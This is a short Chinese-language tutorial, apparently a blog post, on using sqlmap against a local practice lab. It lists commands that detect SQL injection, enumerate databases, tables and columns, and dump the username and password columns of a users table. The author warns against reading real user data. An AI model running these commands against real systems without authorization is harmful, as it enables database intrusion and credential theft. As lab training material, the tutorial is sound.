sqlmap工具是多平台兼容的,可以在windows下使用,Linux下使用。sqlmap利用python编写,在windows下使用需要安装python环境。
首先,我们要有一定的 数据库基础,简单的SQL注入判断,SQL注入就是前端页面可以执行SQL语句,可以操作数据库实现,增,删,改,查,SQL注入的危害就不用我多说了吧。
只要前端页面与数据库有交互的URL,都可能存在SQL注入,注意这里说的是“有可能”。
觉得 有可能存在SQL注入的URL,就用 SQLMAP自动化注入工具进行扫描,测试,验证SQL注入点的存在,存在注入的类型。
进入主题:
打开SQLMAP自动化注入工具,使用 -u 参数,扫描该URL是否存在注入,存在哪些类型的注入?
渗透测试练习环境:
(1)例如:sqlmap.py -u http://127.0.0.1:8000/Less-1/?id=2
(2)通过SQLMAP 的扫描,我们可以看到,该URL地址存在几种注入 报错注入,布尔,联合注入,基于时间注入。下面开始读取数据库的信息。
(3)列出数据库:sqlmap.py -u http://127.0.0.1:8000/Less-1/?id=-2 --dbs
(4)列出当前的数据库:sqlmap.py -u http://127.0.0.1:8000/Less-1/?id=-1 --current-db
(5)指定security数据库并查表:sqlmap.py -u http://127.0.0.1:8000/Less-1/?id=-2 -D "security" --tables
(6)列出表明和字段名:sqlmap.py -u http://127.0.0.1:8000/Less-1/?id=-2 -D "security" -T "users" --columns
(7)最后一条:sqlmap.py -u http://127.0.0.1:8000/Less-1/?id=-1 -D "security" -T "users" -C "username,password" --dump
好了,我就不在操作了,在渗透测试中,点到为止,不能读取用户数据库数据信息!!!
点到为止到(2)已经OK了。